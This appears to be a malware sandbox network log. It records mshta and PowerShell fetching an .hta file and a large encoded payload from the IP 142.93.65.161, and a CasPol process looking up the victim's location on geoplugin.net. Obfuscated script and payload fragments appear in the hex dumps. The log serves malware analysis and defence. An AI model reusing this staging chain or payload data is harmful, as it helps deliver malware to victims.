                                                                                                                                                                                  Data Ascii: WktIklbi = "tHmlLBWfobPienT"qkRlWrWWdoKUcWj = "iNRkGiKbGCCApWo"PKSIibuikcPxcua = "OKtPoRvIkktfAKe"WufGnxtiAGWChQP =
                                                                                                                                                                                  Dec 3, 2024 14:01:11.532206059 CET1236INData Raw: 00 7a 00 6d 00 53 00 57 00 61 00 4f 00 62 00 69 00 47 00 43 00 70 00 22 00 0d 00 0a 00 76 00 4b 00 74 00 5a 00 64 00 6d 00 64 00 4c 00 7a 00 65 00 6a 00 47 00 63 00 57 00 57 00 20 00 3d 00 20 00 22 00 65 00 6b 00 68 00 63 00 4c 00 57 00 6c 00 43
                                                                                                                                                                                  Data Ascii: zmSWaObiGCp"vKtZdmdLzejGcWW = "ekhcLWlCGKhRLpc"lGALUWiauCLWhkP = "fNhZCALWrPUHLog"iRULsofLdlAnfWu = "QxnWfZUeWRkllj
                                                                                                                                                                                  Dec 3, 2024 14:01:11.532217026 CET1236INData Raw: 00 4c 00 4c 00 71 00 7a 00 6a 00 20 00 3d 00 20 00 22 00 4c 00 55 00 73 00 55 00 50 00 62 00 69 00 62 00 4c 00 4c 00 57 00 50 00 5a 00 74 00 66 00 22 00 0d 00 0a 00 63 00 66 00 76 00 62 00 64 00 4a 00 74 00 6e 00 57 00 53 00 71 00 57 00 6b 00 48
                                                                                                                                                                                  Data Ascii: LLqzj = "LUsUPbibLLWPZtf"cfvbdJtnWSqWkHi = "WLTGLzckWLALbKZ"gNkbLWZKzhWQkLC = "GkktSmGURZzLqtG"uKWNpUWWLaPSifW =
                                                                                                                                                                                  Dec 3, 2024 14:01:11.532228947 CET1236INData Raw: 00 57 00 6b 00 22 00 0d 00 0a 00 64 00 67 00 69 00 55 00 4e 00 50 00 4c 00 42 00 4c 00 41 00 4c 00 66 00 55 00 5a 00 69 00 20 00 3d 00 20 00 22 00 51 00 6c 00 4b 00 6f 00 68 00 4e 00 5a 00 62 00 47 00 55 00 49 00 63 00 63 00 55 00 43 00 22 00 0d
                                                                                                                                                                                  Data Ascii: Wk"dgiUNPLBLALfUZi = "QlKohNZbGUIccUC"WNxLvWeKhLmzRUp = "ZeUkeWiiifgGCnv"cWKqPxaUmpZgihA = "WnKUJhWhdPcQLml"lKLdA
                                                                                                                                                                                  Dec 3, 2024 14:01:11.757045031 CET1236INData Raw: 00 20 00 22 00 55 00 57 00 47 00 65 00 71 00 68 00 4e 00 6b 00 4c 00 74 00 6f 00 70 00 68 00 78 00 57 00 22 00 0d 00 0a 00 6f 00 74 00 7a 00 63 00 47 00 4e 00 69 00 6d 00 4e 00 69 00 68 00 4b 00 4b 00 48 00 6b 00 20 00 3d 00 20 00 22 00 4c 00 76
                                                                                                                                                                                  Data Ascii: "UWGeqhNkLtophxW"otzcGNimNihKKHk = "LvZmjLmcIARxWPK"jciGiZuWKNGQWAW = "fhkWKmflipLWHPJ"ehQncLLeWOcKGLu = "ZqbihZWa


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  3192.168.2.2249175142.93.65.161804084C:\Windows\System32\mshta.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 3, 2024 14:01:21.986196041 CET493OUTGET /xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta HTTP/1.1
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Accept-Language: fr-FR
                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                  If-Modified-Since: Tue, 03 Dec 2024 05:33:52 GMT
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Host: 142.93.65.161
                                                                                                                                                                                  If-None-Match: "26ff2-6285702adf515"
                                                                                                                                                                                  Dec 3, 2024 14:01:23.117733002 CET275INHTTP/1.1 304 Not Modified
                                                                                                                                                                                  Date: Tue, 03 Dec 2024 13:01:22 GMT
                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                  Last-Modified: Tue, 03 Dec 2024 05:33:52 GMT
                                                                                                                                                                                  ETag: "26ff2-6285702adf515"
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                  Connection: Keep-Alive


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  4192.168.2.2249177142.93.65.161803984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 3, 2024 14:01:38.667897940 CET77OUTGET /680/SRVRER.txt HTTP/1.1
                                                                                                                                                                                  Host: 142.93.65.161
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948823929 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Tue, 03 Dec 2024 13:01:39 GMT
                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                  Last-Modified: Tue, 03 Dec 2024 05:29:15 GMT
                                                                                                                                                                                  ETag: "a0800-62856f223f03a"
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Content-Length: 657408
                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                                                  Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44 6f 7a 51 7a 4d 77 49 44 70 79 41 71 4d 45 4b 44 67 79 77 6e 4d 77 4a 44 57 79 67 6b 4d 34 49 44 4b 79 67 52 4d 6f 48 44 32 78 51 64 4d 51 48 44 7a 78 67 63 4d 45 48 44 77 78 77 62 4d 34 47 44 72 78 67 61 4d 6b 47 44 6f 78 77 5a 4d 59 47 44 6c 78 41 [TRUNCATED]
                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5gfO0nDozQzMwIDpyAqMEKDgywnMwJDWygkM4IDKygRMoHD2xQdMQHDzxgcMEHDwxwbM4GDrxgaMkGDoxwZMYGDlxAZMMGDixgWMkFDYAAAAQCwBAAAAAADHwgAMAAAAAABAGAOAAAwPs/D5/w9PU/D0/g8P0+Dr/g5PQ+Di/A4P89De/Q3Pw9Da/Q2Pc9DS/A0Ps8DJ/wxPU4D8+guPg7D3+AsPg6Dn+AoPg5DQ+AiPA0D49AcPg2Dg9AWPA1DI9AAPgzDw8AKPAyDY8AEPgwDA7A+OAvDo7A4OgtDQ7AyOEsDA6gvOYrDu6gpO4pDW6gjOYkD+5gdO4mDt5gZO4lDX5AVOwkDE4APOQjDs4AJOwhDU4wDO0gDM4gCOggDG4QxN4fD93w8NEfDu3Q5NEeDg3g3NcdDW3A1NwcDL2gvNsbDz2AsN4aDp2wpNYaDl2woNEaDf2gmNgZDX2glNQZDS2AkNsYDJ2AhNIYDB2AQN4XD81geNUXDz1gcNAXDu1AbNsWDk1wYNMVDP1gQNAQD90QONwSDq0wJNMSDW0AFNERDN0AwM4PD7zw9MoODozQ5MEODUzg0M8MDLygvMwLD5yQtMgKDmywoMEKDfygkMAJDNywiMkED8xgeMcHD1xwcMYGDkxQYM0FDQxgTMsEDHwgOMgDAAB
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948841095 CET1236INData Raw: 67 4a 41 47 41 4e 41 41 41 41 50 77 79 44 6d 38 41 4a 50 4d 79 44 69 38 67 48 50 30 78 44 5a 38 77 45 50 45 78 44 51 38 77 44 50 34 77 44 4e 38 41 44 50 67 77 44 48 38 77 77 4f 30 76 44 37 37 67 2b 4f 6b 76 44 34 37 77 39 4f 59 76 44 79 37 51 38
                                                                                                                                                                                  Data Ascii: gJAGANAAAAPwyDm8AJPMyDi8gHP0xDZ8wEPExDQ8wDP4wDN8ADPgwDH8wwO0vD77g+OkvD47w9OYvDy7Q8O0uDn7Q5OQuDj7g4OEuDd7A3OgtDS7A0O8sDO7QzOwsDI7wxOMoD96wuOorD56QtOQrDw6wrOsqDl6woOIqDe6AmOYpDV6AlOMpDP6QiOgoDC6AQO8nD+5QfOwnD45wdOMnDt5waOomDm5QZOEmDb5QWOglDX5wUO
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948860884 CET1236INData Raw: 6e 44 32 35 41 64 4f 49 6e 44 77 35 67 62 4f 77 6d 44 71 35 41 61 4f 59 6d 44 6b 35 67 59 4f 41 6d 44 65 35 41 58 4f 6f 6c 44 59 35 67 56 4f 51 6c 44 53 35 41 55 4f 34 6b 44 4d 35 67 53 4f 67 6b 44 47 35 41 52 4f 49 6b 44 41 34 67 50 4f 77 6a 44
                                                                                                                                                                                  Data Ascii: nD25AdOInDw5gbOwmDq5AaOYmDk5gYOAmDe5AXOolDY5gVOQlDS5AUO4kDM5gSOgkDG5AROIkDA4gPOwjD6AAQAQDQBwDAAA4D5+wtPU7Dz+QsP86Dt+wqPk6Dn+QpPM6Dh+wnP05Db+QmPc5DV+wkPE5DP+QjPs4DJ+whPU4DD+QQP83D99wePk3D39QdPM3Dx9wbP02Dr9QaPc2Dl9wYPE2Df9QXPs1DZ9wVPU1DT9QUP80DN
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948872089 CET1236INData Raw: 77 4a 50 59 79 44 6c 38 41 4a 50 4d 79 44 69 38 51 49 50 41 79 44 66 38 67 48 50 30 78 44 63 38 77 47 50 6f 78 44 5a 38 41 47 50 63 78 44 57 38 51 46 50 51 78 44 54 38 67 45 50 45 78 44 51 38 77 44 50 34 77 44 4e 38 41 44 50 73 77 44 4b 38 51 43
                                                                                                                                                                                  Data Ascii: wJPYyDl8AJPMyDi8QIPAyDf8gHP0xDc8wGPoxDZ8AGPcxDW8QFPQxDT8gEPExDQ8wDP4wDN8ADPswDK8QCPgwDH8gBPUwDE8wAPIwDB8AwO8vD+AAAAgDQBADAAA0Dx9AcP82Du9QbPw2Dr9gaPk2Do9wZPY2Dl9AZPM2Di9AYP81De9QXPw1Db9QWPY1DV9AVPM1DS9QUPA1DP9QTPw0DL9gSPk0DI9wRPY0DE9gAAAAAXAUAs
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948882103 CET1236INData Raw: 35 44 5a 2b 77 6c 50 55 35 44 54 2b 51 6b 50 38 34 44 4e 2b 77 69 50 6b 34 44 48 2b 51 68 50 4d 34 44 42 39 77 66 50 30 33 44 37 39 51 65 50 63 33 44 31 39 77 63 50 45 33 44 76 39 51 62 50 73 32 44 70 39 77 5a 50 55 32 44 6a 39 51 59 50 38 31 44
                                                                                                                                                                                  Data Ascii: 5DZ+wlPU5DT+QkP84DN+wiPk4DH+QhPM4DB9wfP03D79QePc3D19wcPE3Dv9QbPs2Dp9wZPU2Dj9QYP81Dd9wWPk1DX9QVPM1DR9wTP00DL9QSPc0DF9wQPEwD/8QPPszD58wNPUzDz8QMP8yDt8wKPkyDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948894024 CET1236INData Raw: 51 50 41 41 45 41 77 41 55 41 63 41 41 41 41 2f 51 78 50 4b 38 44 41 2b 59 76 50 73 37 6a 34 2b 67 74 50 4f 37 44 78 2b 6f 72 50 77 36 6a 70 2b 77 70 50 53 36 44 69 2b 34 6e 50 30 35 6a 61 2b 41 6d 50 57 35 44 54 2b 49 6b 50 34 34 6a 4c 2b 51 69
                                                                                                                                                                                  Data Ascii: QPAAEAwAUAcAAAA/QxPK8DA+YvPs7j4+gtPO7Dx+orPw6jp+wpPS6Di+4nP05ja+AmPW5DT+IkP44jL+QiPa4DE+YQP83j89gePe3D19ocPA3jt9waPi2Dm94YPE2Dc9YWPc1jU9gUP80TM9cSPd0zE9kAP/zT98sOPhzT18oMPAzjt8wKPiyzh8QGPBxjJ8swOwvj57w9OSvDy747O0ujq7A6OWuDj7I4O4tjb7U2O+sjN78hO
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948906898 CET776INData Raw: 53 6a 6c 30 51 49 4e 63 4d 6a 75 7a 45 67 4d 35 4c 7a 36 79 6f 74 4d 4e 4c 6a 77 79 49 6f 4d 74 4a 54 57 79 30 6b 4d 45 45 44 78 78 45 62 4d 50 47 54 61 78 59 45 4d 39 44 44 2b 77 49 50 4d 74 44 6a 53 41 41 41 41 59 43 41 42 67 44 77 50 2f 2f 44
                                                                                                                                                                                  Data Ascii: Sjl0QINcMjuzEgM5Lz6yotMNLjwyIoMtJTWy0kMEEDxxEbMPGTaxYEM9DD+wIPMtDjSAAAAYCABgDwP//D2/Q6PS4z/+ksPS6TX+QlPG5TM+EQPq3z39scPA3zu9oZPttzW7A0OIoDs6AqOWqTi68nOwpjV68kOIpTQ64QO5nD95MeOZnzu58ZONmze5wGOyfT63I8NXdDM2s4MCPzozUjMaLTex0aMgGDmxsGM1AAAAwHAEANA
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948919058 CET1236INData Raw: 4a 6a 51 79 73 52 4d 69 48 7a 77 78 63 54 4d 48 41 44 36 77 77 4d 4d 4d 43 6a 64 41 41 41 41 41 43 41 42 67 43 41 41 41 38 44 38 2f 38 39 50 4b 2f 7a 6c 2f 55 7a 50 75 34 7a 59 2b 77 31 4f 73 6f 6a 4d 35 77 61 4f 59 68 54 64 34 38 47 4f 64 68 54
                                                                                                                                                                                  Data Ascii: JjQysRMiHzwxcTMHAD6wwMMMCjdAAAAACABgCAAA8D8/89PK/zl/UzPu4zY+w1OsojM5waOYhTd48GOdhTI4YxNCezM3EgNRTj00QLNtSTl04IN/Rzb0gGNpEjXAAAAIBABQCAP0wDG6svOFrjG6oQOwmTj5cVOFljD4MNO4iDi480NafDz3c8N6eDp344NHejZ3k0NDZTG00xMNNjLzwgMeKDfywmMXJTTxwaMXGjjxEYM2FDI
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948929071 CET224INData Raw: 55 65 4e 5a 57 54 64 31 67 44 4e 79 54 44 32 30 45 4c 4e 39 52 6a 4e 30 30 43 4e 63 4d 7a 39 7a 38 39 4d 58 50 7a 79 7a 6b 37 4d 67 4f 44 6d 7a 45 35 4d 44 4f 6a 64 7a 45 33 4d 6b 4e 7a 58 7a 59 31 4d 49 4e 6a 51 7a 63 7a 4d 78 4d 6a 4a 7a 34 78
                                                                                                                                                                                  Data Ascii: UeNZWTd1gDNyTD20ELN9RjN00CNcMz9z89MXPzyzk7MgODmzE5MDOjdzE3MkNzXzY1MINjQzczMxMjJz4xMTMTDywvM3LD6yUrMiKDjyAoMzJjbygjMmEj4xQWMNBztw0GMVBjBAAAAoCABwAAAA8z+/I6PB6j2+koP15ja+8lPa5DU+skPx4jF9kePR3Tm9MXPW1DI8YPPXrTu6QrOGqTZ6AmOtojJ6
                                                                                                                                                                                  Dec 3, 2024 14:01:39.949811935 CET1236INData Raw: 63 51 4f 39 6e 7a 39 35 67 64 4f 4f 66 6a 32 33 38 38 4e 57 65 54 6a 33 49 79 4e 63 63 6a 46 33 77 67 4e 34 61 44 70 32 34 70 4e 4d 61 44 54 32 45 6a 4e 66 59 6a 44 32 55 51 4e 37 58 7a 38 31 45 65 4e 5a 57 44 6b 31 34 58 4e 33 56 54 44 30 77 50
                                                                                                                                                                                  Data Ascii: cQO9nz95gdOOfj2388NWeTj3IyNccjF3wgN4aDp24pNMaDT2EjNfYjD2UQN7Xz81EeNZWDk14XN3VTD0wPN3Tz60YONTTzx0AMNpSzk00HNuRjP0ICNPMD6zItMeKTbyImMHJzIycQM1DzzwELMTCjTAAAA0CABgAAAA8DZ/c1PH9jO+IoPC5DM+MiPY0D99QcP32Tn9IDPyvzT7oTO9gD34IFOIcz83k5NGZTO1sVN4UDCzcPA
                                                                                                                                                                                  Dec 3, 2024 14:01:40.130892038 CET1236INData Raw: 44 6a 39 77 49 50 4d 75 44 6a 36 77 59 4f 4d 69 44 6a 33 77 6f 4e 4d 57 44 6a 30 77 34 4d 41 41 41 41 71 41 4d 41 63 41 55 44 47 78 41 42 4d 59 43 54 68 41 41 41 41 51 41 77 41 67 42 51 50 73 33 44 36 39 51 65 50 67 33 7a 32 39 59 5a 50 41 31 44
                                                                                                                                                                                  Data Ascii: Dj9wIPMuDj6wYOMiDj3woNMWDj0w4MAAAAqAMAcAUDGxABMYCThAAAAQAwAgBQPs3D69QePg3z29YZPA1DP9gTP00zL9gCPxvzQ7UzOXsDB4wGOohDZ4AGObhjF3A8N8eDu3Q7NveDq3EXNDXTt1cZNESz30wLNbSTl0UINcRzMzYrMmLzbysiMeIzFyEhMLEj+x8dMXHTyxMcM7GjpxkZMJGTexYWMgFjUxgTMVAj7wgNMSDDx


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  5192.168.2.2249180178.237.33.50801200C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 3, 2024 14:01:45.326936960 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                  Host: geoplugin.net
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Dec 3, 2024 14:01:46.425509930 CET1171INHTTP/1.1 200 OK
                                                                                                                                                                                  date: Tue, 03 Dec 2024 13:01:46 GMT
                                                                                                                                                                                  server: Apache
                                                                                                                                                                                  content-length: 963
                                                                                                                                                                                  content-type: application/json; charset=utf-8
                                                                                                                                                                                  cache-control: public, max-age=300
                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                                                                                                                  Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  6192.168.2.2249181142.93.65.161802112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 3, 2024 14:01:52.846601963 CET77OUTGET /680/SRVRER.txt HTTP/1.1
                                                                                                                                                                                  Host: 142.93.65.161
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Dec 3, 2024 14:01:53.979757071 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Tue, 03 Dec 2024 13:01:53 GMT
                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                  Last-Modified: Tue, 03 Dec 2024 05:29:15 GMT
                                                                                                                                                                                  ETag: "a0800-62856f223f03a"
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Content-Length: 657408
                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                                                  Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44 6f 7a 51 7a 4d 77 49 44 70 79 41 71 4d 45 4b 44 67 79 77 6e 4d 77 4a 44 57 79 67 6b 4d 34 49 44 4b 79 67 52 4d 6f 48 44 32 78 51 64 4d 51 48 44 7a 78 67 63 4d 45 48 44 77 78 77 62 4d 34 47 44 72 78 67 61 4d 6b 47 44 6f 78 77 5a 4d 59 47 44 6c 78 41 [TRUNCATED]
                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5gfO0nDozQzMwIDpyAqMEKDgywnMwJDWygkM4IDKygRMoHD2xQdMQHDzxgcMEHDwxwbM4GDrxgaMkGDoxwZMYGDlxAZMMGDixgWMkFDYAAAAQCwBAAAAAADHwgAMAAAAAABAGAOAAAwPs/D5/w9PU/D0/g8P0+Dr/g5PQ+Di/A4P89De/Q3Pw9Da/Q2Pc9DS/A0Ps8DJ/wxPU4D8+guPg7D3+AsPg6Dn+AoPg5DQ+AiPA0D49AcPg2Dg9AWPA1DI9AAPgzDw8AKPAyDY8AEPgwDA7A+OAvDo7A4OgtDQ7AyOEsDA6gvOYrDu6gpO4pDW6gjOYkD+5gdO4mDt5gZO4lDX5AVOwkDE4APOQjDs4AJOwhDU4wDO0gDM4gCOggDG4QxN4fD93w8NEfDu3Q5NEeDg3g3NcdDW3A1NwcDL2gvNsbDz2AsN4aDp2wpNYaDl2woNEaDf2gmNgZDX2glNQZDS2AkNsYDJ2AhNIYDB2AQN4XD81geNUXDz1gcNAXDu1AbNsWDk1wYNMVDP1gQNAQD90QONwSDq0wJNMSDW0AFNERDN0AwM4PD7zw9MoODozQ5MEODUzg0M8MDLygvMwLD5yQtMgKDmywoMEKDfygkMAJDNywiMkED8xgeMcHD1xwcMYGDkxQYM0FDQxgTMsEDHwgOMgDAAB
                                                                                                                                                                                  Dec 3, 2024 14:01:53.979825020 CET1236INData Raw: 67 4a 41 47 41 4e 41 41 41 41 50 77 79 44 6d 38 41 4a 50 4d 79 44 69 38 67 48 50 30 78 44 5a 38 77 45 50 45 78 44 51 38 77 44 50 34 77 44 4e 38 41 44 50 67 77 44 48 38 77 77 4f 30 76 44 37 37 67 2b 4f 6b 76 44 34 37 77 39 4f 59 76 44 79 37 51 38
                                                                                                                                                                                  Data Ascii: gJAGANAAAAPwyDm8AJPMyDi8gHP0xDZ8wEPExDQ8wDP4wDN8ADPgwDH8wwO0vD77g+OkvD47w9OYvDy7Q8O0uDn7Q5OQuDj7g4OEuDd7A3OgtDS7A0O8sDO7QzOwsDI7wxOMoD96wuOorD56QtOQrDw6wrOsqDl6woOIqDe6AmOYpDV6AlOMpDP6QiOgoDC6AQO8nD+5QfOwnD45wdOMnDt5waOomDm5QZOEmDb5QWOglDX5wUO
                                                                                                                                                                                  Dec 3, 2024 14:01:53.979839087 CET1236INData Raw: 6e 44 32 35 41 64 4f 49 6e 44 77 35 67 62 4f 77 6d 44 71 35 41 61 4f 59 6d 44 6b 35 67 59 4f 41 6d 44 65 35 41 58 4f 6f 6c 44 59 35 67 56 4f 51 6c 44 53 35 41 55 4f 34 6b 44 4d 35 67 53 4f 67 6b 44 47 35 41 52 4f 49 6b 44 41 34 67 50 4f 77 6a 44
                                                                                                                                                                                  Data Ascii: nD25AdOInDw5gbOwmDq5AaOYmDk5gYOAmDe5AXOolDY5gVOQlDS5AUO4kDM5gSOgkDG5AROIkDA4gPOwjD6AAQAQDQBwDAAA4D5+wtPU7Dz+QsP86Dt+wqPk6Dn+QpPM6Dh+wnP05Db+QmPc5DV+wkPE5DP+QjPs4DJ+whPU4DD+QQP83D99wePk3D39QdPM3Dx9wbP02Dr9QaPc2Dl9wYPE2Df9QXPs1DZ9wVPU1DT9QUP80DN
                                                                                                                                                                                  Dec 3, 2024 14:01:53.980019093 CET1236INData Raw: 77 4a 50 59 79 44 6c 38 41 4a 50 4d 79 44 69 38 51 49 50 41 79 44 66 38 67 48 50 30 78 44 63 38 77 47 50 6f 78 44 5a 38 41 47 50 63 78 44 57 38 51 46 50 51 78 44 54 38 67 45 50 45 78 44 51 38 77 44 50 34 77 44 4e 38 41 44 50 73 77 44 4b 38 51 43
                                                                                                                                                                                  Data Ascii: wJPYyDl8AJPMyDi8QIPAyDf8gHP0xDc8wGPoxDZ8AGPcxDW8QFPQxDT8gEPExDQ8wDP4wDN8ADPswDK8QCPgwDH8gBPUwDE8wAPIwDB8AwO8vD+AAAAgDQBADAAA0Dx9AcP82Du9QbPw2Dr9gaPk2Do9wZPY2Dl9AZPM2Di9AYP81De9QXPw1Db9QWPY1DV9AVPM1DS9QUPA1DP9QTPw0DL9gSPk0DI9wRPY0DE9gAAAAAXAUAs
